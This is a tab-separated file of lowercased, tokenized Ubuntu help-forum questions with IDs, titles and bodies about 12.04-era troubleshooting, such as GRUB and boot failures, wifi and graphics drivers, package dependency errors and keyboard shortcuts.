list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : conexant analog [ conexant analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
185597	external hard drive not detected after ubuntu crash [ restarting machine ]	today i tried to watch movie [ with vlc media player ] from my external hard drive [ expansion portable 500 gb ] , and it 's play good , then pause the movie and play it again , and my ubuntu crashed ! [ ubuntu 12.04 ] i had to restart the machine , so did it , but after that ubuntu ca n't recognize this hard drive ! i changed usb cable but it was not effective . this is my dmesg command result : [ 191.281630 ] usb 2-1.3 : new full-speed usb device number 9 using ehci_hcd [ 191.353527 ] usb 2-1.3 : device descriptor read/64 , error -32 [ 191.529115 ] usb 2-1.3 : device descriptor read/64 , error -32 [ 191.704669 ] usb 2-1.3 : new full-speed usb device number 10 using ehci_hcd [ 191.776524 ] usb 2-1.3 : device descriptor read/64 , error -32 [ 191.952202 ] usb 2-1.3 : device descriptor read/64 , error -32 [ 192.127772 ] usb 2-1.3 : new full-speed usb device number 11 using ehci_hcd [ 192.534742 ] usb 2-1.3 : device not accepting address 11 , error -32 [ 192.606749 ] usb 2-1.3 : new full-speed usb device number 12 using ehci_hcd [ 193.013696 ] usb 2-1.3 : device not accepting address 12 , error -32 [ 193.013906 ] hub 2-1:1.0 : unable to enumerate usb device on port 3 note : i am able to hear the sound of the external drive lens . when attach hard drive to usb port , the status light goes on , but it 's low bright and i think its power is low ! try to mount in microsoft windows 7 , but nothing happened .
185600	ca n't adjust brightness	i have a toshiba satellite a105-4244 ( intel chipset+integrated graphics ) and i ca n't adjust the brightness . neither the buttons nor the system settings/brightness and lock work . also i tried the grub suggestions acpi_backlight and it did n't solve anything . edit : ubuntu 12.04
185605	system boots into a console when installing with the alternate cd	i just installed 12.04 alternate for the first time to give it a try using a usb stick burned with unetbootin . it installed without a problem . but it booted into a tty1 console without booting into a gui . after logging into the tty1 console , i typed unity . it appeared that the system does n't have unity desktop . how can it be solved ? my installation did n't show any error . something worth mentioning : during installation , i had to choose an option saying 'customize the system to your needs ' something like that i do n't remember correctly with options 'ssh server ' , 'mail server ' , 'ubuntu desktop ' , ... .. , 'manual selection of packages ' etc . i chose 'ubuntu desktop ' . i have n't encountered something like this in 11.04 . to do an installation of alternate iso using unetbootin , i used '12.04_hdmedia ' option of that software and had to change file extension of .ude to .udeb in /pool/main/l/linux that i found in alternate ubuntu cdrom detect to go around with the cdrom detection problem . i have a 945g intel graphics .
185608	setting the path in .profile works without exporting it , how ?	the default .profile does not export path , still the path set there is available to all processes . how does that work ?
185609	running gedit in background	so i 've got this working in a 10.04 ubuntu os in bash where i can run : $ gedit app/file.rb bash opens that file with gedit but it is tied up . how can i make my earlier command equivalent to $ gedit app/file.rb & by default . if it helps here is a copy of my .bashrc file from the 10.04 os : http : //pastie.org/4687219
185612	pidgin icon not showing up in system tray	i uninstalled indicator-messages because i 'd rather have separate icons for my programs . the problem i have now is that pidgin icon wo n't show up ( while others do , like empathy , skype and so on ) . or to be more precise , it shows up but is transparent : when i use the main launcher and there is the dark effect on the top bar , here is how it looks ( black square ) : to summarize where i 'm at with the packages , i 've uninstalled : indicator-messages indicator-status-provider-mc5 indicator-status-provider-pidgin and systray whitelist is set to [ 'all ' ] already .
185616	how can i minimize gnome gui ?	applications have all kind of clutter such as games that i do not need when studying . how can i remove them ? i mean the panel with applications , places and system .
185619	gui for retrieving pdf documents	i have many pdf documents in my computer and i need an easy to use gui for retrieving those that contain certain terms / phrases . so , my question is if there is any such application for ubuntu 12.04 lts ?
185623	change window left and right snap keybinding	i 'm trying to configure the snap functionality as how it is in windows 7 . this means i want windows to snap left with super+left , and right with super+right , rather than ctrl+super+left and ctrl+super+right , which is how it is set in ubuntu now . i 'm using ubuntu 12.04 and i 've tried looking in ccsm , but found the 'grid ' plugin and 'snap ' plugin , but they both seem unused ( i disabled them , with no further consequences ) . i also took a look in keyboard shortcuts , dconf and gconf , but could n't find any bindings out there . i hope any one here can help me out .
185628	why do i get a `` volume with software packages has been detected '' dialog every time i log in ?	this comes up every time i login , how do i remove this or fix it . thanks .
185629	is there a post-it note program ?	the title pretty much says it all . i 'm wondering if there is a good post-it note program for ubuntu 12.04 . i prefer using apt-get install but if you can direct me to one in the software center that is fine too .
185635	what are the benefits of having www in the home folder than in the default /var/www folder	i am trying to explain some students what are the differences between having www on the home folder , for example /home/cyrex/www and in the /var/www . so i wanted to ask here what are the benefits of having it in the home folder instead of the default one .
185636	where can i find a scanner icon ?	i just installed vuescan and i need the path to a scanner icon that i can add to my .desktop file , so that there is n't a blank square in my launcher panel . i have been unable to find anything in /usr/share/icons
185638	after i log in , one letter ( lowercase t ) is n't working ?	as weird as it sounds , my 't ' key works for login ( it is part of my password ) but once i am logged in it does n't work in lower case in any app or at the command line . i have rebooted twice . i am using a toshiba z835 ultrabook . the keyboard know the key is being pressed - the backlight comes on and if i keep it pressed i see flickering indicating that 's it 's being detected , but no 't ' appears . uppercase t is working ok ! plus when i put caps lock on and do shift-t i actually get a lower case 't ' ! obviously ca n't work normally with that .
185642	adding keyboard shortcut for suspend	is there a way that i can setup the ctrl-alt-l shortcut to be suspend instead of lock ? it seems like it would be much more efficient as i 'm not really using lock and unlock every few minutes . i unlock when i start , and lock when i 'm done , and the few seconds suspend takes is n't really much time at all . i 've looked at keyboard > shortcuts > system but there is n't a suspend option there , or any other place i looked .
185645	why does `` tasksel '' give an `` aptitude failed '' error ?	the problem started in the following way . i was using tasksel from the terminal menu that it shows when i simply do sudo tasksel . i select lamp server from the list and started to install all packages related to it . the problem is that by mistake my friend clicked on the termina close button and then on accept , closing the terminal and the activity tasksel was doing . i tried to install the lamp server again and found the following problem : sudo tasksel install lamp-server tasksel : aptitude failed ( 100 ) i should mention that i already have aptitude installed . so the error is not that i am missing aptitude . it worked before closing the terminal . how can i solve this ?
185649	i want to use ubuntu as a firewall and wireless ap , with some external traffic passing through openvpn , and the rest just through a firewall	i would like to do some configuration through zentyal or a similar setup , but i am also willing to use config files . i am connecting to a commercial vpn using a username and password . i want that traffic to then pass through a firewall , then i want to provide services like dhcp and dns to a wired and wireless interface ( wireless using hostapd ) . i also would like to have a similar network on two other interfaces that passes through the firewall but not the vpn . if possible i want both networks to see the local machines on each network and receive services such as a samba and cups share , ntp , etc . it is important the dns passes through the vpn on the vpn bonded network . is this even possible , and if so , how do i accomplish it ? i am not afraid to get my hands dirty , but i am somewhat of a novice at linux networking .
185651	access ubuntu machine via vnc server	i am trying to access my ubuntu machine remotely through a vnc service . i have configured the machine and am successfully able to open a vnc session when pointing to my own machine locally . remotely however i can not establish a connection but am able to ssh in . i 'm using remmima ( sp ? ) client for the vnc service . i think it has something to do with the machine i 'm trying to access locking the screen after a period of inactivity ( ie . when i travel to the remote machine to access it ) . not able to find this answer anywhere , so any tips would be appreciated . system : ubuntu 11.10 32 bit using the stock desktop viewer to configure the vnc session .
185658	windows xp boot conflict	i have a partitioned drive with windows xp on c and ubuntu on d. following update of xp with last service pack i can not get ubuntu to boot . very frustrating .
185661	hide files ending in tilde	these backup files clutter up my screen when i 'm trying to navigate . how do i hide files ending in a tilde so ls does n't show them and only ls -a does . that is , i want them to behave like files which are preceded by a period .
185666	wammu - usb device name ?	i 'm trying to get to my phone 's filesystem through usb in wammu , but i 'm stuck in the configuration wizard when it asks for a usb device name . after about an hour of internet searching , here are the failed solutions i 've already tried , starting with the relevant information returned by lsusb in terminal . lsusb bus 001 device 003 : id 12d1:101e huawei technologies co. , ltd . so i tried opening wammu through sudo wammu in terminal and inputting `` /dev/bus/usb/001/003 '' as the device name , which returns : error opening device device /dev/bus/usb/001/003 does not exist ! and then `` /dev/bus/usb/001/ '' , which returns : failed to connect to phone description : error opening device . unknown , busy , or no permissions. < br > function : init < br > error code : 2 another proposed solution was to try `` tail -f /var/log/messages '' in terminal . but that only returned a `` no such file or directory '' message . seemingly relevant dmesg info : [ 4739.716214 ] usb 1-1 : new high-speed usb device number 8 using ehci_hcd [ 4739.854137 ] scsi9 : usb-storage 1-1:1.0 [ 4740.854416 ] scsi 9:0:0:0 : cd-rom huawei t mass storage 2.31 pq : 0 ansi : 2 [ 4740.867051 ] sr0 : scsi-1 drive [ 4740.867806 ] sr 9:0:0:0 : attached scsi cd-rom sr0 [ 4740.870464 ] sr 9:0:0:0 : attached scsi generic sg1 type 5 i do n't know why it is coming up as cd-rom . but there it is . if you have n't noticed already , i 'm an absolute beginner when it comes to linux and terminal . so speaking to me like i 'm a three year old is welcome if you can propose a solution . i 'm running ubuntu 12.04 lts , and the phone is a huawei u1250 . my computer is an acer aspire one d250/kav60 . any help is much appreciated .
185668	are there any for-pay ( commercial ) but open source applications in ubuntu software center ?	i 've recently decided to try not to support any proprietary software , and see how far i can go with free software . despite this , i realize free software costs money to make , and would be happy to pay for some . is there any way to sort through the software in ubuntu software center to find some , or if not , what applications are there are there ? ( examples would be great ) thanks !
185670	tried results that i searched but was not successful : ( `` error : unknown filesystem . grub rescue > ''	i looked up several threads but was n't successful with the proposed solution . i always seem to get error in like step 2 or something of the proposed solution . i hope someone will be able to help with my situation > . < i am going to list what i have done and what error i had occurred . sorry if the indentation in the error messages are incorrect i am new to command/linux > . < my computer : windows 7 and ubuntu 12.04 lts most recent update : @ tachyons , thank you for pointing out about the internet connection . i did n't know that my wireless was n't automatically connected . i am using wired connection and managed to get the boot repair to install . after clicking `` recommended repair '' , i got the following message ( i have attached screenshot too ) '' the sda6 ( ubuntu 12.04 lts ) partition is nearly full . this can prevent to start it . please use the file browser that just opened to delete unused files ( or transfer them to another disk ) . close this window when you are finished . '' the file that just opened is the window called `` home '' i am not sure how to proceed ... x.x ? ! screenshot : screenshot , how do i increase size ? will it be safe to try the other sudo commands listed in my old post ( they probably did n't work because my connection was on ? ) old posts ( keeping the following messages for now until the problem is fixed ) . boot repair i get the following error message when typing the sudo command in usb disk ubuntu : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/bin/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 6 , `` could n't resolve host 'launchpad.net ' '' ) reinstall grub following the instruction the page , from step 2 , i found out that my extended is sda4 step 3 , i typed in mkdir temp i got stuck at step 4 , after i typed in the command , i got the following message : mount : you must specify the filesystem type another grub repair attempt after i typed in sudo grub i got the following message : sudo : grub : command not found more grub repair attempt i got the following message using the command sudo update-grub /usr/sbin/grub-probe : error : can not find a device for / ( is dev mounted ? ) . the following attempt was done while in the grub rescue > screen : grub rescue - error : unknown filesystem for my case it was ( hd0 , msdos6 ) when i typed in insmod normal , i got the following error message : error : unknown systemfile grub rescue > : ( so ... i found a lot of relevant posts , but none of them was able to get me through , did i make any mistake ? is there anything else i can try ? please help > . < thank you in advance .
185672	problem with dpkg-preconfigure , how to correct ?	i was trying to install teamviewer , and i followed the instructions here even though they specify 11.10 instead of 12.04 ( what i 'm running ) . in particular , i executed . $ wget http : //www.teamviewer.com/download/teamviewer_linux.deb $ sudo dpkg -i teamviewer_linux.deb the dpkg command failed , and after this point my packaging system has been broken . the software center instructs me to try : $ sudo apt-get -f install which leads to reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : teamviewer7 : i386 0 upgraded , 0 newly installed , 1 to remove and 17 not upgraded . 9 not fully installed or removed . need to get 89.0 kb of archives . after this operation , 81.9 mb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise/main dash amd64 0.5.7-2ubuntu2 [ 89.0 kb ] fetched 89.0 kb in 1s ( 83.9 kb/s ) e : sub-process /usr/sbin/dpkg-preconfigure -- apt || true returned an error code ( 100 ) e : failure running script /usr/sbin/dpkg-preconfigure -- apt || true at this point i 'm stumped .
185673	what linux program reads atrac3+ ?	i have about 20 files of music in the format .aa3 . which linux-compatible program reads that format ?
185674	new to ubuntu - 12.04.1 kernel panic on installation	i 'm a complete ubuntu and even linux newbie . i 'm learning here , so i 'm grateful for any info to help me learn more about this . i have a dell dimension 2400 with a pentium 4 and 1gb of ram . it 's older but it 's only going to be doing some small stuff for me when i get it up and going . i 've tried installing several versions of linux ( but i really , really want ubuntu ) and i keep getting a similar kernel panic message . the problem is i do n't have a clue what that means or how to begin fixing it . i would appreciate any help to get my machine up and going . i have already tried installing alternate ubuntu versions burning multiple 12.04.1 disks installing other versions of linux i have a picture of the screen to share ; however , i ca n't post due to the fact that i do n't have enough reputation points on this forum because i 'm a newbie . i would be happy to email you a pic , if you think you can help .
185677	grub wo n't install on macbook air 5,2 ( 13 '' 2012 )	i 've run into a brick wall trying to get 12.04.1 lts running on my new macbook air 5,2 ( 2012 13 '' model ) . the problem i keep getting is grub failing to install ; here 's the output from virtual terminal 4 : sep 9 02:02:57 grub-installer : info : installing grub on '/dev/sda5' sep 9 02:02:58 grub-installer : info : grub-install supports -- no-floppy sep 9 02:02:58 grub-installer : info : running chroot /target grub-install -- no-floppy -- force `` /dev/sda5 '' sep 9 02:02:58 grub-installer : /usr/sbin/grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . sep 9 02:02:58 grub-installer : error : running 'grub-install -- no-floppy -- force `` /dev/sda5 '' ' failed . i 'm trying to dual-boot os x and ubuntu . i first resized the hfs+ partition in disk utility using os x , then installed refit , then dd 'd the alternate-amd64+mac version of the disk image to a usb stick and booted off that . i 'm also setting noapic before beginning the installation as recommended in this forum post . at first , following the advice in that post , i tried the daily image from cdimage.ubuntu.com/precise/daily/current/ and was getting an error message almost identical to the above . then , hoping the release version would be more stable , i dd 'd `` ubuntu-12.04.1-alternate-amd64+mac.iso '' from cdimage.ubuntu.com/releases/12.04/release/ to my usb stick instead . same result . /dev/sda5 is a 1.0 mb partition of type `` reserved bios boot area '' . googling the `` can not find a device for /boot/grub '' error does n't seem to turn up anything relevant to my situation . any ideas how i can solve this ?
185680	default home directory permission allow read ?	i need help with some basic permissions logic . i noticed that default permissions for a home folder are drwxr-xr-x . how does that make sense ? everyone has access to other people 's home folders ?
185686	how do i modify the empathy notifications to only show generic messages ?	is there a way to customize the popup notifications for empathy in ubuntu 12.04 so that instead of displaying the message contents and the sender , they only say `` new message '' or something like that ? i know that there are some ways to modify the appearance or behavior of popups , but i have n't seen anything that would do this yet .
185687	ubuntu does n't start from usb after installation	my computer refuses to boot from the usb even after i change everything that i can possibly think of on my motherboard 's bios . but i have booted from the usb twice in the past . the first time is when i first got the computer and needed to install a new operating system . the second time is when i installed windows onto the whole hard drive and needed to reinstall ubuntu . it seems that it only refuses to boot if there is already an existing installation of ubuntu on the hard drive . any ideas on what is going on ?
185691	why ca n't mythtv backend see my hdhomerun tuner ?	ran a fresh install of mythbuntu 12.04.1 32bit . went through the backend setup and was able to see my hdhomerun prime ( hdhr3 ) device , scan , and detect channels . can not get to live tv on frontend . backend log seems to indicate it 's not detecting my tuner , even though i configured it in the setup . sep 8 15:03:33 dimension-8300 mythbackend [ 1668 ] : e tvrecevent dtvmultiplex.cpp:325 ( parsetuningparams ) dtvmux : parsetuningparams -- unknown tuner type = 0x2000 sep 8 15:03:33 dimension-8300 mythbackend [ 1668 ] : e tvrecevent dtvchannel.cpp:308 ( setchannelbystring ) dtvchan ( 192.168.1.12-0 ) : setchannelbystring ( 3_1 ) : failed to initialize multiplex options sep 8 15:03:33 dimension-8300 mythbackend [ 1668 ] : e tvrecevent tv_rec.cpp:3681 ( tuningfrequency ) tvrec ( 1 ) : failed to set channel to 3_1 . reverting to kstate_none
185693	wifi gets automatically disabled in ubuntu 12.04 gnome classic	i am using a hp dv2000 series laptop . i have a broadcom 802.11g wireless apapter installed on the machine . while surfing the internet in ubuntu 12.04 , sometimes the wifi gets disabled automatically . ( sudo rfkill list shows that wlan is hard locked ) . i have tried commands like sudo rfkill unblock all but the hard lock still remains . i have to always restart my laptop to get the wifi working again . any solutions to this problem ?
185694	ca n't replace mdm display manager with lightdm !	well , i installed mdm , and found it 's buggy with my vga hardware due to the following screen after rebooting : this screen repeats , even if i choose yes or no as i have access to the console ( by pressing alt+f2 ) i tried , sudo dpkg-reconfigure lightdm which gave me the following screen , even if i choose lightdm nothing happens at the next reboot . the first screen comes back ! dpkg -l | grep -i mdm command results me following , ii mdm___________1.0.4-0~webupd8~precise_____gnome display mnager ii mint-mdm-themes__1.0.5-0~webupd8~precise1_____linux mint mdm themes ( underscores are spaces ) please help ... i need lightdm login screen back ! thanks !
185695	blank screen on 12.04	can hit ctrl-alt-f1 and login but no fixes work . tried nomodeset and everything else appears to have upgraded but ca n't see anything . i really need this computer to work . it is an old dell with 1.6 processor with old school monitor . i do n't know why people are giving my question negative votes . if you know how to fix this , then please help me , as i have read and tried all the solutions that i 've found . just for the record reformatting is not fixing it , and i ca n't get a boot cd to load either . if you know how to use the blank screen fix tutorial , please explain cos i 'm lost . most people do n't understand this stuff and an easy `` how-to '' fix would be nice .
185701	pae kernel required for my cpu	after loading ubuntu-12.04.1-desktop-i386.iso into my oracle vm , the hard drive would not boot because the version for my cpu require the pae kernel . how do i insert the pae kernel or download a copy of ubuntu with the pae kernel ?
185706	kde and gnome option at booting	can i have selection menu of kde and gnome at log-on enabling to select which environment i want to boot into in ubuntu 12.04
185707	how to change strange kde scrollbars ?	from a fresh ubuntu 12.04 install i tried multiple desktops , and settled on kde . one problem i have with it is how scrollbars are displayed in thunderbird : in gimp , dolphin , firefox there are completely normal scrollbars . i checked on unity and this did n't happen there . how do i change this ?
185708	how to remove firefox alert sound without lowering the system sound	i am trying to remove or mute the firefox sound ( the boom sound and the quick drum sound ) when : i try to close firefox with multiple tabs a download fails any other case where that horrible heart killing sound pops up i read several ways to do this but all involve either lowering the sound of firefox via the system settings , or lowering the overall sound of the system , both of which i do not want to do . i just want to actually remove or disable the sound . note that i still want to get the warning but without the horrible sound . ps - it is also my suggestion that that sound will make you go deaf and blind if not already . i think a cat dies every time that sound is heard and scares the hell out of me when i am working calm and quiet .
185710	install kde 4.9 plasma netbook on 12.04	i 'm curious about kde 4.9 , and i 've seen that there 's a desktop specially created for netbooks called plasma netbook or something like that so i wanted to try it out . is there any way ? i have installed ubuntu 12.04 lts , upgraded from 10.04 lts . besides that i 've read somewhere that kde 4.9 brings some problems to the system stability and functionality ( like the appearance window not opening and some packages uninstalled ) , so i wanted your word of wisdom and experience .
185715	i ca n't add a new keyboard layout	i ca n't add any new layout to my keyboard , the button is deactivated ! an error message raised to me to include the output of those 4 commands in the error report ! moemen @ moemen : ~ $ xprop -root | grep xkb _xkb_rules_names_backup ( string ) = `` evdev '' , `` pc105 '' , `` us '' , `` '' , `` '' _xkb_rules_names ( string ) = `` evdev '' , `` pc105 '' , `` us '' , `` '' , `` terminate : ctrl_alt_bksp '' moemen @ moemen : ~ $ gsettings get org.gnome.libgnomekbd.keyboard model '' moemen @ moemen : ~ $ gsettings get org.gnome.libgnomekbd.keyboard layouts @ as [ ] moemen @ moemen : ~ $ gsettings get org.gnome.libgnomekbd.keyboard options @ as [ ]
185716	problem with gnome-shell-extensions-user-theme	i 'm trying to install themes with gnome tweak , and i need to install gnome-shell-extensions-user-theme because otherwise i can not see the shell extensions tab . however , i can not install shell extensions . i have tried to install by adding the ppa with the following : sudo add-apt-repository ppa : webupd8team/gnome3 then , sudo apt-get update finally , when i try to install : sudo apt-get install gnome-shell-extensions-user-theme it gives an error : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages . i am convinced that there is a problem with the package . so i went on and tried to install the extensions from the website : https : //extensions.gnome.org/ but even though i use firefox ( 15.0 ) , i can not see the `` switch '' that is being mentioned to install the extension . maybe the version of firefox is too new . is there any workaround that you know of ? ( by the way , i use ubuntu 12.04 , freshly downloaded and installed . )
185718	allow non-admin users to mount drives via nautilus	i want to give mount privilege to the non-admin users to mount the drives via nautilus . i do n't want them to give other admin privilege . i also do n't want to use setuid method . how can i achieve this ? i 'm using ubuntu 12.04 .
185720	why is update manager giving `` failed to fetch cd-rom ... '' errors ?	when i check for updates , i get this the message : w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . please suggest what i should do ?
185721	g77-3.4 installed from hardy repositories but	i need g77-3.4 and have installed it from hardy repositories on ubuntu 12.04 but to compile a program after make command it returns g77 : command not found this procedure have no problem on ubuntu 9.01 , 10.10. is there any way to link `` g77 '' to its proper location ?
185724	applications installations location	i am installing many applications -both from terminal line ubuntu software centre . but i am unable to find out where those files are getting saved.pls help me out
185726	should i use the ati proprietary or free drivers with two crossfire hd5850s ?	i own 2 xfx radeon hd 5850 in crossfire configuration connected to 3 24 '' monitors . i really want to make ubuntu my daily os but ca n't seem to find the best configuration to use . some threads say that the free driver is better then the ati one and some say the new catalyst fully takes advantage of the card capabilities . anyone out there with a similar setup ? what are your recommendations for a good production in 12.04 setup ?
185729	kernel 3.2.0-30-generic , does n't support raedon ati drivers , why ?	i upgraded my kernel to 3.2.0-30-generic . since the new kernel install my ati drivers are no more supported . i 've tried reinstalling the ati drivers manually . but the process does n't seem to help . i am using amd raedon : 6400 series 1gb graphic card . i have been following this link previously : - correct way to install ati drivers please provide your valuable inputs .
185738	partitioning a hard drive before install	i have a new asus laptop that i got from the university . the guys at the computing centre recieved it before me , erased the hard disk , and installed all their crappy software ( novel , outlook , and the like ) . i tried to install ubuntu with dual boot , but because they apparently did whatever it is they did wrong , and the installer does not recognize the existing windows installation and only suggests to install ubuntu as a sole os . none of the advices here or here helped . my final decision is to indeed let ubuntu erase all existing windows stuff ( and then use windows occasionally through virtualbox ) . however , when i try to do that it tells me that the partitioning looks like gpt but does n't have the correct signatures , or something like this . it asks whether this is indeed a gpt hd , and i do n't know what to tell it . what i ask is : should i simply use gparted from the cd to repartition the hd ? if so , what would be the recommended partitioning ( i have 750gb ) , and the recommended filesystem ( ext3 ? ext4 ? ) . update : here 's a screen shot thanks in advance for any advice .
185748	copying to/from ntfs partitions very slow	my whole system slows down when i copy files between an ntfs drive to my local home directory . this is a new 12.04 installation with the latests 12.8 amd ati driver . using gnome-shell or unity does the same . machine specs : 6 gigs on ddr1333 ram 3.2 oced core i7 2 hd5850 in crossfire . i think the machine should be faster . does n't it ? how can i improve this ?
185749	12.04 does not detect wlan0 ( broadcom 4365 )	installed 12.04 on dell inspiron 5420. wired connection is working however wifi and bluetooth connection does not work . in fact i ca n't see wlan0 . can i know the correct driver to install ?
185754	assigning a script to a keystroke to toggle touchpad	since my default sony vaio shortcuts do n't completely work in ubuntu 12.04 , i 'd like to assign a script to fn + f1 , which toggles the touchpad on and off , so that the cursor would stop moving while i 'm typing . since i use a mouse and rarely need to use the touchpad , i do n't want to use `` disable touchpad while writing '' , which does n't really seem to work anyway . i figured that using a script with the following command ( this works , but i have to open up a terminal each time ) : xinput set-prop 12 `` device enabled '' 0 i have two problems at this point . one is that i do n't know how to write this script so that it will toggle it off if it is on , and on if it is off . i know i should use an if statement but i do n't know what value i should be checking to see if it is on or off . the second one is that i am having problems creating a new shortcut . i use system settings - > keyboard - > shortcuts . i tried to add , to custom shortcuts , a new one by clicking the '+ ' sign . i named it toggle touchpad , and added the path to the executable script with the line above , by typing /home/irem/.toggletouchpad i have made it an executable with chmod . the problem is that when i click apply , and then click back on it to define the keystroke , it re-opens the dialogue . i can not define new keys . ( it says disabled on the right column of the entry ) . i have also tried xbindkeys , which almost constantly crashes . i 'd prefer the system settings , if i can set the shortcut . i 'd appreciate if anyone can help . thanks .
185755	synaptic package manager does n't launch from the application menu	my synaptic package manager not launching from application menu but i can launch it from terminal with gksudo synaptic . i have tried several times but from application menu i ca n't launch it . the command is synaptic-pkexec is for launching it .
185756	installed thinkfan , should i keep it ?	well i did fixed my overheating problem on my lenovo t500 with ubuntu 12.04 lts . at the same time i did install thinkfan . but since i have a solution for overheating now , i would like to know if there is any really good reason to keep it ? my fan speed without it was cca 3000 rpm . when it installed droped to 2500rpm in idle time . thinkpad have very quiet fans , so i do n't really hear the noise when is on 3000rpm ( no difference between 2000 or 3000 rpm ) . is it better for processor to have more air or more air brings just more dust ? silly question but i would really want to know the reason of keeping thinkfan .
185760	hard disk raid data lost after restart	i have ubuntu 12.04 and two disks working via raid . in bios i have set them up to use raid . after i restart computer all data changes are lost . i had these drives in another computer , and they worked fine there .
185763	how can i launch matlab 2012 ?	i have a problem with the matlab 2012 installation . after having installed it using alt+f2 and having used gksudo nautilus i have installed matlab in the correct folder which is : /usr/local/matlab/r2012a then i inserted the license and the window told `` activation complete '' or something like that . this made me happy , but only for a while because as soon as i try to search for matlab within the applications i can not find it and neither if i try to run matlab into terminal it says : command not found can someone help me ! ? tanks in advance !
185769	i ca n't set 1280x1024 resolution in 12.04	after installing a fresh ubuntu 12.04 on my pc , ubuntu ca n't detect my monitor which is a phillips 190c 19 '' . with 10.10 , i used 1280x1024 and on nvidia drivers i was able to see my monitor brand . but on 12.04 , i can only see crt-0 . i also tried with the command xrandr to add a new mode without any success . see attached screen-shots . please help .
185775	how can i capture video from my camcorder via usb streaming in ubuntu ?	i have a laptop with 12.04 lts . i want to import video stored in my camcoder . the camcoder has magnetic tape . how can i import the video using usb streaming , as my laptop does not contains any firewire port & there is only usb cable provided with camcoder ?
185780	uninstalling/deleting calligra	i am installed calligra on ubuntu 12.04 , but i do not like it and now i want to uninstall it . i am installed unstable release with project-neon . i am tried to delete folder in /opt but i can not permanetly delete it . how to uninstall/delete calligra and project neon ?
185784	configuration of the network manager via dbus : how to set the ad hoc mode	i have an hard nut to crack : a nice bottle of italian chianti wine to the solver ! : ) to automatically configure wifi , i first have to kill the network manager and than activate the wifi via the command-line : i do this all automatically in my application and works great . however , it is not the right way to do this . as the user has no network gui anymore to configure some other network access . a much better and transparent way would be to configure wifi directly via network manager over the dbus interface . i was able to configure it , but i was n't able to set it to ad hoc mode . searching the web for a while : a lot about configuration in general but nothing related to ad hoc mode . i think the only way to do figure that out is to look into the source code of the network manager ... maybe someone already did it and he can answer .
185785	ubuntu-fedora dual-boot : set up swap partitions for simultaneous hibernation ?	i want to install another linux distribution ( fedora ) besides ubuntu 12.04 on my laptop . as i like to hibernate my system and as i want to use this feature on both installed linux distributions , how many swap partitions do i need ? and if i need multiple swap partitions , how do i configure them ? edit/clarification : i want to be able to hibernate both operating systems simultaneously . i assume that i need a separate swap partition for each installation ( correct ? ) , so how do i assign a specific swap partition to each of the installations , avoiding that one of my installations uses the wrong swap partition ? is it enough to list only the assigned swap partition in an installation 's /etc/fstab ? or what else do i have to do ?
185787	booting into 12.04 results in a purple sceen for just a second .	i have a vanilla ubuntu install running on an ivy-bridge ultrabook that is using intel 4000 graphics . i have enabled autologin via a line in the lightdm config file . my boot is very fast , however , it is ugly . the screen will be black , all solid purple for a second , then plymouth for a second , then desktop . i would really like to figure out what the solid purple is and how to remove it . i would like to either have a different color ( black ) or skipped entirely .
185791	ca n't install deluge	i 'm trying to install deluge through synaptic package manager but i got problem : deluge : depends : python-libtorrent but it is not going to be installed i have tried reinstall python-libtorrent by apt-get and also i got problem : the following packages have unmet dependencies : python-libtorrent : depends : libtorrent-rasterbar6 ( = 0.15.7-1 ) but 0.15.9+svn.r6292-0ubuntu1~natty is to be installed how actually i can install deluge ? thanks
185793	unmet dependencies+i can not update anymore	the following packages have unmet dependencies : krb5-multidev : depends : libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libk5crypto3 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libgssapi-krb5-2 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libgssrpc4 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libkadm5srv-mit8 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed depends : libkadm5clnt-mit8 ( = 1.10+dfsg~beta1-2ubuntu0.2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed i tried this without any success : when trying to upgrade kerberos development libraries , why do i get an `` unmet dependencies '' error ?
185794	my laptop can not boot neither ubuntu nor windows 7 : `` no bootable devices '' error	when i start my laptop , the error shows as : 'no bootable devices ' press f1 to retry , f2 for setup , and f3 for scan . when i put in my windows 7 cd , the same problem happens . my laptop ca n't read the disk either .
185799	is there any good car diagnostics application ?	is there any application with which i could do car diagnostics over obdi , obdii etc . ?
185803	raid 1 ca n't install ubuntu 12.04	i am trying to install ubuntu desktop on hp compaq 8000 from an ubuntu live cd . i connected two disks in raid , but in installation type , i ca n't select nothing .
